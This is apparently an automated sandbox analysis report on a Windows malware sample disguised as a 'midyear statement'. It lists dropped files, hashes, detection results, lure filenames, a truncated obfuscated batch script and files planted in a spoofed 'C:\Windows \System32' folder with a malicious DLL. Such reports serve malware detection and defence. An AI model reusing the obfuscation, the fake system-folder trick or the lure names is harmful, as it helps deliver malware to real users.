                                                                                                                                                                                        SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                        • Filename: aMObJ2eTUf.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: Inquiry_GMD_Specifications_7266738879_G#2024.cmd, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Win32.Evo-gen.9756.30202.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Win32.Evo-gen.7105.24636.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: Material Purchase Order for the Supply.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: product_order.cmd, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: ungziped_file.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: DHL SHIPPING DOCUMENT - BL - AWB PACKING LIST_02292024.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: DHL SHIPPING DOCUMENT - BL - AWB PACKING LIST_02292024.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: DHL_AWB#6078538091.exe, Detection: malicious, Browse
                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):989
                                                                                                                                                                                        Entropy (8bit):5.019408940029604
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12:tkEU+nd6UGkMyGWKyGXPVGArwY3yGhsp+axH0sp+GYArpv/mOAaNO+ao9W7iN5zp:qydVauKyGX852sesPvXhNlT3/75ciWro
                                                                                                                                                                                        MD5:D3D1956DA737B1B3EF05DA28210D81B7
                                                                                                                                                                                        SHA1:40287B4136212BFD82AE0388DD3178721926FCDB
                                                                                                                                                                                        SHA-256:0BA354EA36476D11344D1E20DED0C3658FD39B6D436C916AE02FB1E7DC47D742
                                                                                                                                                                                        SHA-512:EA5BAF54FBB5BFD754308DCF2F9C77E9840BA8B194906060A77958F22CC76F5CDC317D68566EFEAD200D4934EF2DBECDBC3DCA089327AC7771136C9AE8AEB7D9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:{. "geoplugin_request":"102.165.48.43",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Washington",. "geoplugin_region":"District of Columbia",. "geoplugin_regionCode":"DC",. "geoplugin_regionName":"District of Columbia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"38.894",. "geoplugin_longitude":"-77.0365",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                        Entropy (8bit):1.1510207563435464
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:NlllulRjFllp:NllU
                                                                                                                                                                                        MD5:7B390667B7AD392C3A7ECD95310E0D68
                                                                                                                                                                                        SHA1:F7ED92E360DACA5B2BB3152AFB8A26DD5A408706
                                                                                                                                                                                        SHA-256:E233F71BD3E7F3B34DC94F8F9DDB533F59E07BE7AEFA021541DF0160436E1C0D
                                                                                                                                                                                        SHA-512:0131C5BD611E47AF843A354F9AD83CAE0AA4A64B0FB723BB485B9FBDBF409A98BB5248336BCDE84FF72E3EB44D2EC10C30133767CD0DE32C77757C0EE75DCCC2
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:@...e.................................@. ............@..........

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3luth4im.4e3.psm1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cciqjdho.kwp.ps1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imfx2ezv.jpo.psm1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5tomrjh.33x.ps1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\bhv348F.tmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbda68b75, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):14680064
                                                                                                                                                                                        Entropy (8bit):0.9773375313961997
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6144:ggMnQEUUMBPPpBPJmNjfiEWC7WswQpWK/qZCCkxpu514dCVZ3L9yqXx4SU8GxJHL:xn/cj5tND5ApBK4K
                                                                                                                                                                                        MD5:4D670AFC0ACDE5EFAFDD756D8D7444E1
                                                                                                                                                                                        SHA1:3D805BD200DBB8A3E12CC418A663DABA241E6986
                                                                                                                                                                                        SHA-256:87AD9A15E53285B2D2714912F27967B2B24EB75B161920D288D36FC9A807C127
                                                                                                                                                                                        SHA-512:7D6364D4F8CC981CAFDA46095BD19B3AD8472CB00039CF495604754DB76D7F123B93812F6BFB8AB56A5EC7CA3B7C454370CAB0203CA2A000C140EC43BF0022EC
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:...u... ................./..(...{........................&......6...{5.9:...|..h.(.........................:.I..(...{..............................................................................................P...........eJ......n........................................................................................................... .......93...{a..............................................................................................................................................................................................(...{...................................)..9:...|..................cd..9:...|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                        Category:modified
                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..

                                                                                                                                                                                        C:\Windows \System32\2506803.exe

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\midyear_statement.exe
                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):131648
                                                                                                                                                                                        Entropy (8bit):5.225468064273746
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                                                                                                        MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                                                                                                        SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                                                                                                        SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                                                                                                        SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                        • Filename: aMObJ2eTUf.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: Inquiry_GMD_Specifications_7266738879_G#2024.cmd, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: ENQUNION096424 CLOSING DATE URGENT.bat, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: PI-BD2403001.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: Order inquiry.bat, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: Statement Of Account - Overdue Payments #94839540823489.bat, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: Document.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: BBRAUN VIETNAM - RFQ-QT240422703-01 - 3-29-2024-20-00.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Win32.Evo-gen.9756.30202.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Win32.Evo-gen.7105.24636.exe, Detection: malicious, Browse
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                        C:\Windows \System32\KDECO.bat

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\midyear_statement.exe
                                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (432), with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):11898
                                                                                                                                                                                        Entropy (8bit):4.716832845643102
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:UPNoaJSjPMK2jxkXDmZevmhmpd/mGq5LnRWF7NpL29QeQoGAhLNTbz4UgHCHDQSq:KNjsjUKwxCiZevmgpd/jcnRu7imoG8Le
                                                                                                                                                                                        MD5:C545650595B479C81AD6B9D8882AAE39
                                                                                                                                                                                        SHA1:7A98AA2E6EEE23B3C1BBA876955D525BC618B3F0
                                                                                                                                                                                        SHA-256:A3A80983CB33159F0455FA0135789402558BAA1460DB94D0071318512B8CB5F9
                                                                                                                                                                                        SHA-512:85AC596A7DA9072A28C4178E4FDEDC98F1B49C8E3FE5612CFE464833297B13F65D2DC59B52D7FC9970CFF8F98D954111229AEC0ED9DDED454E03B0CF4EBB6FF3
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:@echo off..@%.%e%.. . %c%......%h%.. %o%.... .% %....%o%...%f%.... %f% ...... %..s%.%e%. ........%t%......% %.... ..%"%. .%p%.........%g% .%D% ..%D%...%=% .%s%.%e%.. ......%t%... ...% %.......%"%..... .%..%pgDD%"%.. ..%j%..... %K% .%u%.. . %f%....%=%......%=%........%"%.... %..%pgDD%"%. . ...%s%.%n%.. ......%e%.... .. .%S%.... ..%P%.%N%... .%L%...%M% ..... %i%..... %y% ...%%jKuf%k% ..%"%...%..%pgDD%"%.... .%t%.%V%.. .. ...%n%.. .......%F% %G%.. .%K% %a% .%w% %X%.. . .%M%. ...%%jKuf%h%. . ....%2% ....%s%..%h%.......%"%.... ...%..%pgDD%"%.... .%e%........%w% ..... .%f%....%J% ........%q%........%K%. .... %y%....... ..%s% %u%.. ..%y%.... .....%%jKuf%r%..... ...

                                                                                                                                                                                        C:\Windows \System32\netutils.dll

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\midyear_statement.exe
                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):115372
                                                                                                                                                                                        Entropy (8bit):5.091814440717213
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:sLW5ID3z1yOjXtZqmsGyhvI5jduvd9a8yCl7MbiRVRpz5u:sLWi/LZq3hvUuvd9a8BRpz5u
                                                                                                                                                                                        MD5:FA7AA88417D0C48807144A1A48FE3FBC
                                                                                                                                                                                        SHA1:6F5EC990B12D4A6075050A94E0D68D03781FA46D
                                                                                                                                                                                        SHA-256:2019DCD18BA7D5554A4A9DA882740AA883941670AF3DE9396960081A0F8AA098
                                                                                                                                                                                        SHA-512:99B2EB6F8E7D00A3803CBA229149E5E0CB67A3DEB607782C55FBACD25D9C074CCE83759DE15490EFF939D5AD98F26CDBD44395CC79FFE22753E16C3D9E3B5FFF
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........X......... ....."....................<a.............................0......%......... ..............................................................`..(...............\........................... ...(........................................................... .......".................. .P`........P....@.......(..............@.P..............P.......*..............@.P@........(....`.......0..............@.0@.............p.......4..............@.0@......................................p......................6..............@.0@.....................8..............@.0..CRT....X............@..............@.@.........h............B..............@.`.........\............D..............@.0B/4...................F..............@.PB/19..................J..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Entropy (8bit):7.0065077195606165
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        File name:midyear_statement.exe
                                                                                                                                                                                        File size:1'265'664 bytes
                                                                                                                                                                                        MD5:dd8e3f6ac5c24960b3a69490082c60e1
                                                                                                                                                                                        SHA1:c5f8aaec5baa571791789dd5fac53e27938dbc29
                                                                                                                                                                                        SHA256:15db18392d7bbf15b30e528db05ec306e00ac3227277d0639064ec3e2bc98c73
                                                                                                                                                                                        SHA512:ac96e6fb368f5e2c8b8a80eb32635357f1931838b8575125956fe2e3c2465b7bd228606635f3563bb0a047b3bc8fbd19d25e0609210c4574c05993ec078ad205
                                                                                                                                                                                        SSDEEP:12288:evGkW/sci4Vup7XNihvMHH59TpfLFhLme7iEEEblTHQE1ZEQrfvAcEH+DwxTe8g:e+Rg+up7XNiyHZ994eHQEQahz
                                                                                                                                                                                        TLSH:2E45AE6EE2ACC4B2D32305F9FA7EE2A454177F9D35D5A87628E05B4C8F24E442B18D43
                                                                                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:4545454582800145

                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Entrypoint:0x46174c
                                                                                                                                                                                        Entrypoint Section:.itext
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                        DLL Characteristics:
                                                                                                                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:95e6ff319c3c0cad8b9eba5a52b7f0bf

                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                        Instruction
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                        add esp, FFFFFFF0h
                                                                                                                                                                                        mov eax, 0045FE9Ch
                                                                                                                                                                                        call 00007F8655B54D55h
                                                                                                                                                                                        mov eax, dword ptr [005003F0h]
                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                        call 00007F8655BA6389h
                                                                                                                                                                                        mov ecx, dword ptr [005004E4h]
                                                                                                                                                                                        mov eax, dword ptr [005003F0h]
                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                        mov edx, dword ptr [0045F200h]
                                                                                                                                                                                        call 00007F8655BA6389h
                                                                                                                                                                                        mov eax, dword ptr [005003F0h]
                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                        call 00007F8655BA63FDh
                                                                                                                                                                                        call 00007F8655B52C9Ch
                                                                                                                                                                                        lea eax, dword ptr [eax+00h]
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                        Data Directories

                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1050000x254e.idata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1110000x2d600.rsrc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x10a0000x6da4.reloc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x1090000x18.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x1056f80x5cc.idata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                        Sections

                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        .text0x10000x5f0bc0x5f2001ecf1d7143e499155380c4995f50b189False0.5161331718134035data6.510122862830429IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .itext0x610000x7940x800e803240c858df3c127eb1809388764fcFalse0.60107421875data5.9952669540002335IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .data0x620000x9e57c0x9e6004547ef6539e858cc93387f00c5dd2371False0.6012449437647988data7.201954364591318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .bss0x1010000x36700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .idata0x1050000x254e0x2600f1ed380672936dc448e119c5c1d18db7False0.31743421052631576data4.935734860474981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .tls0x1080000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .rdata0x1090000x180x20052e2cf246b2f6aee6ec066aa9d0e6490False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .reloc0x10a0000x6da40x6e00f6a690fb0d6dce92cce81351a71705efFalse0.6305752840909091data6.686248646056259IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
